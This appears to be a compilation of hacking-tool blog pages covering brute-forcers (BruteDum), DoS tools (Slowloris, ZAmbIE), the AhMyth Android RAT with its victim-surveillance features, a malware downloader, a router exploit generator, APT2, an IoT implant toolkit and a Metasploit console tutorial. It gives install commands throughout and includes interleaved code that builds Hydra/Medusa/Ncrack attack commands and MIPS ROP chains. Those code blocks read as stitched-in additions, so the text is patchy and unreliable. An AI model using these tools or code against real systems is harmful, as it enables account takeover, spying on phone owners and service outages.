
BruteDum: Brute Force Attacks Against SSH, FTP, Telnet, PostgreSQL, RDP, VNC With Hydra, Medusa And Ncrack

About BruteDum 1.0
   BruteDum is an SSH, FTP, Telnet, PostgreSQL, RDP and VNC brute-forcing tool that wraps Hydra, Medusa and Ncrack. BruteDum can run on any Linux distribution that has Python 3.

Features of BruteDum:
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra (recommended)
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Medusa
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Ncrack
 * Scan the target's ports with Nmap

Install and run on Linux
   You have to install Python 3 first:
    * Install Python 3 on Arch Linux and its derivatives: sudo pacman -S python
    * Install Python 3 on Debian and its derivatives: sudo apt install python3

   You have to install Hydra, Medusa, Nmap and Ncrack too:
    * On Arch Linux and its derivatives: sudo pacman -S nmap hydra medusa ncrack
    * On Debian and its derivatives: sudo apt install nmap hydra medusa ncrack

   Then download BruteDum-master.zip, extract it, open a Terminal in its folder and enter the command: python3 brutedum.py
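What a wrapper like BruteDum does under the hood is translate one choice of service, target and wordlists into each backend's own command line. The following Python is an added illustration written for this page, not BruteDum's code: it maps the six services to the keywords Hydra, Medusa and Ncrack expect (note that Ncrack calls PostgreSQL psql), builds the argv list for the chosen backend and for the Nmap port-scan step, and only executes anything when asked, so it can be dry-run offline. The tool names and flags are the real ones; the target address, wordlist paths and the dry-run default are assumptions.

```python
"""Build Hydra / Medusa / Ncrack command lines the way a BruteDum-style
wrapper has to. Added example for this page, not BruteDum's own code.
Target, wordlist paths and port overrides below are assumptions."""
import shlex
import subprocess

# default port, Hydra service, Medusa module, Ncrack service.
# The backends disagree on the PostgreSQL keyword (Ncrack: psql), which is
# exactly the kind of detail a menu-driven wrapper hides from the user.
SERVICES = {
    "ssh":      (22,   "ssh",      "ssh",      "ssh"),
    "ftp":      (21,   "ftp",      "ftp",      "ftp"),
    "telnet":   (23,   "telnet",   "telnet",   "telnet"),
    "postgres": (5432, "postgres", "postgres", "psql"),
    "rdp":      (3389, "rdp",      "rdp",      "rdp"),
    "vnc":      (5900, "vnc",      "vnc",      "vnc"),
}

def build_scan(target):
    """Nmap step: version-scan just the ports the six services use."""
    ports = ",".join(str(SERVICES[s][0])
                     for s in ("ftp", "ssh", "telnet", "postgres", "rdp", "vnc"))
    return ["nmap", "-sV", "-p", ports, target]

def build_command(tool, service, target, userlist, passlist, port=None):
    """Return argv for `tool` against `service` on target:port.

    userlist may be None when the service authenticates with a password
    only (VNC); the user-list flag is then simply omitted.
    """
    if service not in SERVICES:
        raise ValueError(f"unsupported service: {service}")
    default_port, hydra_svc, medusa_mod, ncrack_svc = SERVICES[service]
    port = str(port or default_port)

    if tool == "hydra":
        cmd = ["hydra"]
        if userlist:
            cmd += ["-L", userlist]
        cmd += ["-P", passlist, "-s", port, target, hydra_svc]
    elif tool == "medusa":
        cmd = ["medusa", "-h", target, "-n", port, "-M", medusa_mod, "-P", passlist]
        if userlist:
            cmd += ["-U", userlist]
    elif tool == "ncrack":
        cmd = ["ncrack", "-P", passlist]
        if userlist:
            cmd += ["-U", userlist]
        cmd.append(f"{ncrack_svc}://{target}:{port}")
    else:
        raise ValueError(f"unsupported tool: {tool}")
    return cmd

def render(cmd):
    """Shell-quoted one-liner, to show the user before anything runs."""
    return shlex.join(cmd)

def run(cmd, dry_run=True):
    """Dry run by default: return the rendered command instead of executing it."""
    if dry_run:
        return render(cmd)
    return subprocess.run(cmd, check=False).returncode

if __name__ == "__main__":
    target = "192.0.2.10"   # assumption: documentation address, not a real host
    print(run(build_scan(target)))
    for tool in ("hydra", "medusa", "ncrack"):
        print(run(build_command(tool, "postgres", target, "users.txt", "passwords.txt")))
```

Keeping the dry run as the default is deliberate: a wrapper that prints the exact backend command before executing lets the operator confirm the target and port, which is the check that matters most before a noisy, account-locking login attack.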

Screenshots of BruteDum

   Menu of tools
   Scanning the target's ports with Nmap
   Ready to brute force
   Brute force finished
Video demo of BruteDum

Thanks to GitHackTools (myself) for programming this tool 🙂

Contact the coder
 * Website: GitHackTools.blogspot.com
 * Twitter: @SecureGF
 * Facebook: @GitHackTools
 * Google Plus: It's gone.

To-do list: create wordlists with crunch.


Tool-X: Turn Your Linux Distro Into A Pentesting OS With 263 Hacking Tools

About Tool-X

   Tool-X is a Kali Linux hacking tool installer. Tool-X was developed for Termux and other Android terminals. With Tool-X you can install about 263 hacking tools in the Termux app and in other Linux-based distributions. Tool-X is now also available for Ubuntu, Debian...

How to use Tool-X?
 * Type 0: to install all tools.
 * Type 1: to show all available tools, then type the number of the tool you want to install.
 * Type 2: to show the tool categories.
 * Type 3: to install an operating system in Termux.
 * Type 4: if you want to update Tool-X.
 * Type 5: if you want to know about us.
 * Type x: to exit.


Install and run Tool-X
   You have to install Python 2 first: sudo apt install python2 python2-pip
   Then download Tool-X-master.zip, extract it, open its folder in a Terminal and enter the command: sudo python ./Tool-X.py



Read more: Katoolin: Install pentest tools from Kali Linux on GNU/Linux


Malicious: A Malware Downloading Tool Written In Python 2

About Malicious: Malicious is a malware downloading tool written in Python 2.


Install Malicious on Linux
   You have to install Python 2 and Ruby first:
    * On Arch Linux and its derivatives: sudo pacman -S python2 ruby
    * On Debian and its derivatives: sudo apt install python2 ruby

   After that, install lolcat with gem: sudo gem install lolcat

   Then download Malicious-master.zip, extract it, open a Terminal in its folder and enter the command: pip2 install -r requirements.txt && python2 malicious.py



Slowloris: A DoS Attacking Tool Written In Python 3 For Low Bandwidth

What is Slowloris?
   Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:
    * We start making lots of HTTP requests.
    * We send headers periodically (every 15 seconds) to keep the connections open.
    * We never close a connection unless the server does so. If the server closes a connection, we create a new one and keep doing the same thing.

   This exhausts the server's thread pool and the server can't respond to other people.
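Seen from the server, the three steps above leave a tell-tale pattern: many connections from one source, each open for a long time, each having sent part of a request but never the empty line that ends the header block, so a worker thread stays parked in a read on every one of them. The following Python is an added example written for this page, not part of the slowloris project: it applies exactly that rule to a constructed snapshot of a connection table. The sample records, the 30-second age threshold and the per-source count are assumptions. A long-lived connection whose headers did complete (a slow download) is deliberately not flagged, and neither is a very young incomplete one.

```python
"""Flag Slowloris-style connections in a snapshot of a server's connection
table. Added example for this page, not part of the slowloris project.
Sample records and thresholds are constructed assumptions."""
from collections import defaultdict

def headers_complete(buf: bytes) -> bool:
    """A request head ends with an empty line; Slowloris never sends one."""
    return b"\r\n\r\n" in buf or b"\n\n" in buf

def parked_connections(conns, min_age=30):
    """Connections old enough to matter whose request head never finished.
    Each conn is (source ip, seconds since accept, bytes received so far)."""
    return [(ip, age, buf) for ip, age, buf in conns
            if age >= min_age and not headers_complete(buf)]

def detect_slowloris(conns, min_age=30, min_conns=3):
    """{source ip: count} for sources holding >= min_conns parked connections."""
    per_source = defaultdict(int)
    for ip, _age, _buf in parked_connections(conns, min_age):
        per_source[ip] += 1
    return {ip: n for ip, n in per_source.items() if n >= min_conns}

def pool_exhausted(conns, pool_size, min_age=30):
    """True when parked connections alone fill the worker pool, i.e. the
    server can no longer answer anyone else (the effect the text describes)."""
    return len(parked_connections(conns, min_age)) >= pool_size

# Constructed snapshot: 203.0.113.7 behaves like the client described above,
# sending a request line plus a trickle of "X-a: N" headers and never the
# terminating blank line.
SAMPLE = [
    ("203.0.113.7", 95 - 10 * i,
     f"GET /?{i} HTTP/1.1\r\nHost: www.example.com\r\nX-a: {i}\r\n".encode())
    for i in range(5)
] + [
    # ordinary client: finished its headers and was answered at once
    ("198.51.100.2", 1, b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    # long-lived but legitimate: headers complete, it is just a slow download
    ("198.51.100.3", 40, b"GET /big.iso HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    # too young to judge: a slow but honest client still sending its request
    ("198.51.100.4", 2, b"GET /"),
]

if __name__ == "__main__":
    print(detect_slowloris(SAMPLE))             # {'203.0.113.7': 5}
    print(pool_exhausted(SAMPLE, pool_size=5))  # True
```

The age threshold is the knob that separates Slowloris from a slow but honest client on a bad link; set it above your server's normal header-read timeout, or the detector will flag the same connections the server is about to drop on its own.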

SOCKS5 proxy support in Slowloris
   However, if you plan on using the -x option in order to connect through a SOCKS5 proxy instead of directly from your own IP address, you will need to install the PySocks library (or any other implementation of the socks library) as well. PySocks is a fork of SocksiPy by GitHub user @Anorov and can easily be installed by adding PySocks to the pip command above or by running it once more like so: sudo pip3 install PySocks

   You can then use the -x option to activate SOCKS5 support and the --proxy-host and --proxy-port options to specify the SOCKS5 proxy host and its port, if they differ from the default 127.0.0.1:8080.

Install and run Slowloris
sudo pip3 install slowloris
slowloris [target's address]
   or
git clone https://github.com/gkbrk/slowloris
cd slowloris
python3 slowloris.py [target's address]

Configuration options: it is possible to change the behaviour of slowloris with command-line arguments.

License of Slowloris: the code is licensed under the MIT License.


ZAmbIE: A DoS And DDoS Attacking Toolkit Written In Python 2

About ZAmbIE
   ZAmbIE is a DoS and DDoS attacking toolkit made by Lunatic2 and written in Python 2. It covers recon and information gathering and has a collection of DoS and DDoS attacks.

Install and run ZAmbIE on Debian
git clone https://github.com/zanyarjamal/zambie
cd zambie
bash Installer.sh
python zambie.py

Screenshots of ZAmbIE




AhMyth-Android-RAT: Android Remote Administration Tool For Linux And Windows

About AhMyth-Android-RAT
   AhMyth-Android-RAT consists of two parts:
    * Server side: a desktop application based on the Electron framework (control panel).
    * Client side: an Android application (backdoor).

Install and run AhMyth-Android-RAT from source code
   You have to install the Electron framework (to start the app) and Java (to generate the APK backdoor) first.
      Install Electron
    * For Windows: download here and extract it.
    * For Debian-based: follow this tutorial, then enter the command: sudo npm install electron.

      Install Java
    * For Windows: download and install here.
    * For Debian-based: follow this tutorial.

   Then open a Terminal and enter these commands:
git clone https://github.com/AhMyth/AhMyth-Android-RAT
cd AhMyth-Android-RAT/AhMyth-Server
npm start

Install and run AhMyth-Android-RAT from binary files
   You need to install Java to generate the APK backdoor:
    * Install Java for Windows: download and install here.
    * Install Java for Debian-based: follow this tutorial.

   Then download and install the .DEB (for Debian-based) or .EXE file (for Windows) from Releases · AhMyth/AhMyth-Android-RAT · GitHub.

   Then open a Terminal and enter sudo ahmyth to start AhMyth-Android-RAT.

Screenshots of AhMyth-Android-RAT
   A list of victims
   Recording with the front camera
   File Manager
   Take SMS list
   Get call logs
Video about AhMyth-Android-RAT

Donate to the author of AhMyth-Android-RAT
   Twitter account: @AhMythDev
   You can donate to the author by Bitcoin to this address: 1EVwLuwmbsEuej7qJnNquFeQJLsgd2b8Lq. Or scan the QR code!
Created by GitHackTools


dnsmap: A DNS Domain Name Gathering And Brute Forcing Tool

About dnsmap
   Author: pagvac
   License: GNU General Public License v2.0

   dnsmap was originally released back in 2006 and was inspired by the fictional story “The Thief No One Saw” by Paul Craig, which can be found in the book “Stealing the Network – How to 0wn the Box”.

   dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. During the enumeration phase, the security consultant would typically discover the target company's IP netblocks, domain names, phone numbers...

   Subdomain brute-forcing is another technique that should be used in the enumeration phase, as it is especially useful when other domain enumeration techniques such as zone transfers don't work.

Tools included in dnsmap
   dnsmap – DNS domain name brute forcing tool
   dnsmap-bulk.sh – DNS domain name brute forcing tool (bulk mode, one domain per line)

dnsmap usage example
   dnsmap: scan a domain like example.com with a wordlist like /usr/share/wordlists/dnsmap.txt:
   dnsmap-bulk: create a file containing domain names, like domains.txt, and pass it to dnsmap-bulk.sh
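The technique dnsmap automates is small enough to show in full. The following Python is an added example written for this page, not dnsmap's own code: it resolves each wordlist entry under the target domain, first resolving random labels to detect wildcard DNS (the usual source of false positives in subdomain brute-forcing) and discarding hits that only return the wildcard answer, and wraps that in a bulk runner in the spirit of dnsmap-bulk.sh. The resolver is injectable: by default it is socket.getaddrinfo, i.e. the system resolver, and the fake zone at the bottom is constructed so the code runs offline.

```python
"""Subdomain brute-forcing in the style of dnsmap, with a wildcard check.
Added example for this page, not dnsmap's own code. FAKE_ZONE and
fake_resolve are constructed so the logic can run without network access."""
import random
import socket
import string

def system_resolve(name):
    """Return the set of IPs for name, or an empty set on NXDOMAIN/failure."""
    try:
        return {ai[4][0] for ai in socket.getaddrinfo(name, None)}
    except socket.gaierror:
        return set()

def wildcard_ips(domain, resolve, tries=2):
    """Resolve a few random labels under domain; any answer means wildcard DNS,
    and those addresses must not count as discoveries later."""
    found = set()
    for _ in range(tries):
        label = "".join(random.choices(string.ascii_lowercase, k=12))
        found |= resolve(f"{label}.{domain}")
    return found

def brute_force(domain, wordlist, resolve=system_resolve):
    """Return {fqdn: ips} for wordlist entries that resolve to something
    other than the wildcard answer. Entries are lower-cased and blanks skipped."""
    wild = wildcard_ips(domain, resolve)
    hits = {}
    for word in wordlist:
        word = word.strip().lower()
        if not word:
            continue
        fqdn = f"{word}.{domain}"
        ips = resolve(fqdn) - wild
        if ips:
            hits[fqdn] = ips
    return hits

def bulk(domains, wordlist, resolve=system_resolve):
    """dnsmap-bulk.sh equivalent: run brute_force over several domains."""
    return {d: brute_force(d, wordlist, resolve) for d in domains}

# Constructed fake zone for offline use. example.com has a wildcard record
# pointing at 192.0.2.99, so "dev" must be dropped as a false positive.
FAKE_ZONE = {
    "www.example.com":  {"192.0.2.10"},
    "mail.example.com": {"192.0.2.20"},
    "dev.example.com":  {"192.0.2.99"},
    "vpn.example.org":  {"198.51.100.5"},
}

def fake_resolve(name):
    """Stand-in resolver over FAKE_ZONE (constructed, not real DNS)."""
    if name in FAKE_ZONE:
        return set(FAKE_ZONE[name])
    if name.endswith(".example.com"):   # wildcard record
        return {"192.0.2.99"}
    return set()

if __name__ == "__main__":
    print(bulk(["example.com", "example.org"], ["www", "mail", "dev", "vpn"], fake_resolve))
```

Against a real target, swap fake_resolve for the default system_resolve and read the wordlist from a file; the wildcard check is what keeps a wordlist of thousands of entries from reporting thousands of "subdomains" that all point at the same catch-all address.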

Install dnsmap

   Note: dnsmap is already installed on Kali Linux, Parrot Security OS, BlackArch, DracOS and other pentesting OSes.

Screenshots of dnsmap




InfoSploit: An Information Gathering Tool Written In Python 2

About InfoSploit 1.0:

   InfoSploit is a simple Python 2 script for information gathering.
   Tested on: Linux and Android phone (Termux, no root).

Install and use InfoSploit
Features of InfoSploit

Video about InfoSploit

About the author of InfoSploit
 * Github account: CybernetiX-S3C
 * Facebook fanpage: @Cyber.S3C.Professional
 * Youtube channel: CybernetiX


Router-Exploit-Shovel: An Automated Application Generator For Stack Overflow Types On Wireless Routers

About Router-Exploit-Shovel
   Router-Exploit-Shovel is an automated application generator for stack overflow types on wireless routers.

   Router Exploit Shovel is an automated attack-code generation tool for stack overflows on wireless routers. The tool implements the core functions of an exploit: it can adapt to the length of the data padding on the stack, generate the ROP chain, generate the encoded shellcode, and finally assemble them into complete attack code. The user only needs to attach the attack code at the overflow location of the PoC to complete the remote code execution exploit.

   The tool supports MIPSel and MIPSeb. Run on Ubuntu 16.04 64-bit.

Router-Exploit-Shovel's Installation
   Open your Terminal and enter these commands:
Usage


   Example: python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

Router-Exploit-Shovel's screenshot

Code structure

ROP chain generation
   This tool uses templates to generate ROP chains. Patterns are extracted from common ROP exploitation procedures, and regex matching is used to find available gadgets to fill in the chain strings. Base64 encoding is used to avoid duplicate character escapes. For example:

Attackblocks
   You can find the generated attack blocks in results/attackBlocks.txt. Such as:
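The regex-driven gadget search and the endianness handling described under "ROP chain generation" above, as an added illustration written for this page and not Router-Exploit-Shovel's own code. The disassembly excerpt is constructed, the two gadget patterns are generic MIPS idioms chosen for illustration rather than a chain for any real router binary, and the padding length is an assumption; the point is how consecutive instruction lines are matched against a pattern list and how the addresses found are packed for MIPSel (little-endian) versus MIPSeb (big-endian) when laid into the payload.

```python
"""Regex-driven ROP gadget search over a disassembly listing, MIPSel/MIPSeb
aware. Added example for this page, not Router-Exploit-Shovel's code.
LISTING is a constructed objdump-style excerpt, not a real binary."""
import re
import struct

# Constructed disassembly lines, "address: mnemonic operands". Not from a real binary.
LISTING = """\
004a1d20: move $t9,$s0
004a1d24: jalr $t9
004a1d28: addiu $a0,$sp,24
004a1d2c: jr $t9
004a1d30: lw $ra,28($sp)
004a1d34: lw $s0,24($sp)
004a1d38: jr $ra
004a1d3c: addiu $sp,$sp,32
""".splitlines()

# Gadget templates: one regex per instruction, matched on consecutive lines.
# Illustrative idioms only; a real tool carries many more per architecture.
GADGETS = {
    # branch to whatever was loaded into $s0 ("call register" gadget)
    "call_s0":  [r"move \$t9,\$s0", r"jalr \$t9"],
    # compute a stack address into $a0, then jump via $t9
    "sp_to_a0": [r"addiu \$a0,\$sp,\d+", r"jr \$t9"],
}

ADDR_RE = re.compile(r"^([0-9a-f]{8}):\s+(.*)$")

def parse_listing(lines):
    """[(address, instruction text)] for every well-formed listing line."""
    out = []
    for line in lines:
        m = ADDR_RE.match(line.strip())
        if m:
            out.append((int(m.group(1), 16), m.group(2).strip()))
    return out

def find_gadgets(lines, gadgets=GADGETS):
    """{name: address} for each gadget whose pattern sequence appears on
    consecutive instructions; the first occurrence wins."""
    insns = parse_listing(lines)
    found = {}
    for name, patterns in gadgets.items():
        for i in range(len(insns) - len(patterns) + 1):
            if all(re.fullmatch(p, insns[i + k][1]) for k, p in enumerate(patterns)):
                found[name] = insns[i][0]
                break
    return found

def pack_addr(addr, endian):
    """4-byte address in target byte order: mipsel little, mipseb big."""
    if endian not in ("mipsel", "mipseb"):
        raise ValueError(f"unknown endianness: {endian}")
    return struct.pack("<I" if endian == "mipsel" else ">I", addr)

def build_chain(lines, order, endian, pad_len, filler=b"A"):
    """Padding up to the saved return address, then the gadget addresses in
    `order`. pad_len is the assumed distance from buffer start to that slot."""
    found = find_gadgets(lines)
    missing = [g for g in order if g not in found]
    if missing:
        raise LookupError(f"gadgets not found: {missing}")
    return filler * pad_len + b"".join(pack_addr(found[g], endian) for g in order)

if __name__ == "__main__":
    print(find_gadgets(LISTING))
    print(build_chain(LISTING, ["sp_to_a0", "call_s0"], "mipsel", pad_len=8).hex())
```

Two things the toy makes visible that bite in practice: a pattern that matches only the first gadget occurrence may pick an address containing a byte the target's input filter rejects (the reason the page's tool encodes its output), and the same chain is silently wrong on a MIPSel board if the addresses were packed big-endian.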


APT2: An Automated Pentesting Toolkit Written In Python 2


About APT2 - An Automated Penetration Testing Toolkit
   This tool will perform an Nmap scan, or import the results of a scan from Nexpose, Nessus, or Nmap. The processed results will be used to launch exploit and enumeration modules according to the configurable Safe Level and the enumerated service information.

   All module results are stored on localhost and are part of APT2's Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.

   NOTE: APT2 is currently only tested on Linux-based OSes. If you can confirm that it works on other OSes, please tell the author.

APT2 Installation
   You have to install the Metasploit Framework first:
    * For Debian-based distros:
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall && sudo ./msfinstall
    * For Arch Linux-based distros: sudo pacman -S metasploit


Current External Program/Script Dependencies
   To make full use of all of APT2's modules, the following external dependencies should be installed on your system: convert, dirb, hydra, java, jexboss, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan, xwd.

APT2 Configuration (Optional)
   APT2 uses the default.cfg file in the misc directory. Edit this file to configure APT2 to run as you want.

   Metasploit RPC API (Metasploit): APT2 can utilize your host's Metasploit RPC interface (MSGRPC). Additional information can be found here: RPC API

   NMAP: configure the Nmap scan settings to include the target, scan type, scan port range, and scan flags. These settings can also be changed while the program is running.

   Threading: configure the number of threads APT2 will use.

How to run APT2?
   With no options: python2 apt2.py
   With a configuration file: python2 apt2.py -C <config.txt>
   Import Nexpose, Nessus, or Nmap XML: python2 apt2.py -f <nmap.xml>
   Specify a target range to start: python2 apt2.py --target 192.168.1.0/24

Safe Level on APT2: safe levels indicate how safe a module is to run against a target. The scale runs from 1 to 5, with 5 being the safest. The default configuration uses a Safe Level of 4, but it can be set with the -s or --safelevel command-line flags.
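How the imported scan and the Safe Level interact is easiest to see in code. The following Python is an added example written for this page, not APT2's own code: it parses a constructed Nmap -oX excerpt into a small knowledge base of up hosts and open TCP services, then schedules only those modules whose rating is at or above the threshold. The module table (names, service bindings and ratings) is hypothetical and is not APT2's module list, and the hosts and services in the XML are constructed.

```python
"""Import Nmap XML into a small knowledge base and select modules by Safe
Level. Added example for this page, not APT2's own code. SAMPLE_NMAP_XML
and MODULES are constructed/hypothetical, not APT2's real data."""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="161"><state state="open"/><service name="snmp"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Hypothetical module table: (module name, service it keys on, safe level 1..5).
MODULES = [
    ("nmap_sshversion",      "ssh",          5),
    ("hydra_ssh_bruteforce", "ssh",          2),   # noisy, can lock accounts
    ("smb_enumshares",       "microsoft-ds", 4),
    ("msf_ms08_067",         "microsoft-ds", 1),   # exploit, may crash the host
    ("dirb_http",            "http",         3),
    ("snmpwalk_public",      "snmp",         4),
]

def import_nmap_xml(xml_text):
    """KB as {ip: {port: service}} for open TCP ports on hosts that are up."""
    kb = {}
    root = ET.fromstring(xml_text)
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        kb[ip] = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            kb[ip][int(port.get("portid"))] = name
    return kb

def schedule(kb, safelevel=4, modules=MODULES):
    """Sorted (module, ip, port) for every open service a module handles,
    keeping only modules rated >= safelevel (5 = safest, as on the page)."""
    plan = []
    for ip, ports in kb.items():
        for port, service in ports.items():
            for name, svc, level in modules:
                if svc == service and level >= safelevel:
                    plan.append((name, ip, port))
    return sorted(plan)

if __name__ == "__main__":
    kb = import_nmap_xml(SAMPLE_NMAP_XML)
    for level in (5, 4, 1):
        print(level, schedule(kb, level))
```

Lowering the Safe Level from the default 4 to 1 is what lets the exploit-class module onto the plan; with the table above that is the difference between read-only enumeration and a module that can take the host down, which is why the flag deserves a deliberate choice per engagement.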

APT2 help menu

APT2 usage example

APT2's modules

Video about APT2



IoT-Implant-Toolkit: A Framework For Implantation Attacks On IoT Devices


About IoT-Implant-Toolkit
   IoT-Implant-Toolkit is a framework of useful tools for malware implantation research on IoT devices. It is a toolkit consisting of essential software tools for firmware modification, serial port debugging, software analysis and stable spy clients. With an easy-to-use and extensible shell-like environment, IoT-Implant-Toolkit is a one-stop toolkit that simplifies the complex process of IoT malware implantation.

   In MarvelTeamLab's research, they have successfully implanted Trojans in 8 devices, including smart speakers, cameras, driving recorders and mobile translators, with IoT-Implant-Toolkit.

   A demo GIF:

IoT-Implant-Toolkit's Installation
   You must install ffmpeg and sox first:
  • For Debian-based distro users: sudo apt install sox ffmpeg
  • For Arch Linux-based users: sudo pacman -S sox ffmpeg

   Then open your Terminal and enter these commands:

Usage
   Three commands are supported:
  • list: list all plugins.
  • run: run a specific plugin with "run [plugin] [parameters]".
  • exit: exit the toolkit.


Metasploit Framework Command Line: MSFconsole | Metasploit Tutorials


What is the MSFconsole?
   The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console and gives you efficient access to virtually all of the options available in the MSF. MSFconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of this interface.

Benefits to Using MSFconsole:
 * It is the only supported way to access most of the features within Metasploit.
 * Provides a console-based interface to the framework.
 * Contains the most features and is the most stable MSF interface.
 * Full readline support, tabbing, and command completion.
 * Execution of external commands in msfconsole is possible:

Open MSFconsole
   The MSFconsole is launched by simply running msfconsole from the command line. MSFconsole is located in the /usr/share/metasploit-framework/msfconsole directory.

   The -q option removes the launch banner by starting msfconsole in quiet mode.

How to Use the msfconsole Command Prompt
   You can pass -h to msfconsole to see the other usage options available to you.

   Entering help or a ? at the msf command prompt will display a list of available commands along with a description of what they are used for.

Tab Completion on MSFconsole
   The MSFconsole is designed to be fast to use, and one of the features that helps this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to use. As with most other shells, entering what you know and pressing ‘Tab’ will present you with a list of the options available to you, or auto-complete the string if there is only one option. Tab completion depends on the ruby readline extension, and nearly every command in the console supports it.

 * use exploit/windows/dce
 * use .*netapi.*
 * set LHOST
 * show
 * set TARGET
 * set PAYLOAD windows/shell/
 * exp

MSFconsole Core Commands
   back: Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the back command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from inside other modules. As a reminder, variables will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back
msf >

   banner: Simply displays a randomly selected banner.
   check: There aren't many exploits that support it, but there is also a check option that will check whether a target is vulnerable to a particular exploit instead of actually exploiting it.
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.194.134   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status... (path: 0x0000005a)
[*] System is not vulnerable (status: 0x00000000)
[*] The target is not exploitable.
msf  exploit(ms08_067_netapi) >

   color: You can enable or disable whether the output you get through the msfconsole will contain colors.

msf > color
Usage: color <'true'|'false'|'auto'>

Enable or disable color output.

   connect: There is a miniature Netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with Netcat or Telnet.

msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
DD-WRT login:

   You can see all the additional options by issuing connect -h.

   edit: The edit command will edit the current module with $VISUAL or $EDITOR. By default, this will open the current module in Vim.

msf exploit(ms10_061_spoolss) > edit
[*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/windows_error'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info = {})

   exit: The exit command will simply exit msfconsole.
msf exploit(ms10_061_spoolss) > exit
root@kali:~#

   grep: The grep command is similar to Linux grep. It matches a given pattern in the output of another msfconsole command. The following is an example of using grep to match output containing the string “http” from a search for modules containing the string “oracle”.


   info: The info command will provide detailed information about a particular module, including all options, targets, and other information. Be sure to always read the module description prior to using it, as some modules may have undesired effects.

      The info command also provides the following information:
    * The author and licensing information.
    * Vulnerability references (ie: CVE, BID, etc).
    * Any payload restrictions the module may have.

   irb: Running the irb command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework.

msf > irb
[*] Starting IRB shell...

>> puts "Hello, metasploit!"
Hello, metasploit!
=> nil
>> Framework::Version
=> "4.8.2-2014022601"

   jobs: Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.

   kill: The kill command will kill any running job when supplied with the job id.

msf exploit(ms10_002_aurora) > kill 0
Stopping job: 0...

[*] Server stopped.

   load: The load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key=val on the shell.

msf > load
Usage: load <path> [var=val var=val ...]

Loads a plugin from the supplied path.  If path is not absolute, first looks
in the user's plugin directory (/root/.msf4/plugins) then
in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
The optional var=val options are custom parameters that can be passed to plugins.

msf > load pcap_log
[*] PcapLog plugin loaded.
[*] Successfully loaded plugin: pcap_log

   loadpath: The loadpath command will load a third-party module tree from the given path, so you can point Metasploit at your own 0-day exploits, encoders, payloads, etc.
msf > loadpath /home/secret/modules

Loaded 0 modules.

   unload: Conversely, the unload command unloads a previously loaded plugin and removes any extended commands.
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

   resource: The resource command runs resource (batch) files that can be loaded through msfconsole.

msf > resource
Usage: resource path1 [path2 ...]

Run the commands stored in the supplied files.  Resource files may also contain
ruby code between <ruby></ruby> tags.

See also: makerc

   Some attacks, such as Karmetasploit, use resource files to run a set of commands in a karma.rc file to create an attack. Later, we will discuss how, outside of Karmetasploit, that can be very useful.

msf > resource karma.rc
[*] Processing karma.rc for ERB directives.
resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
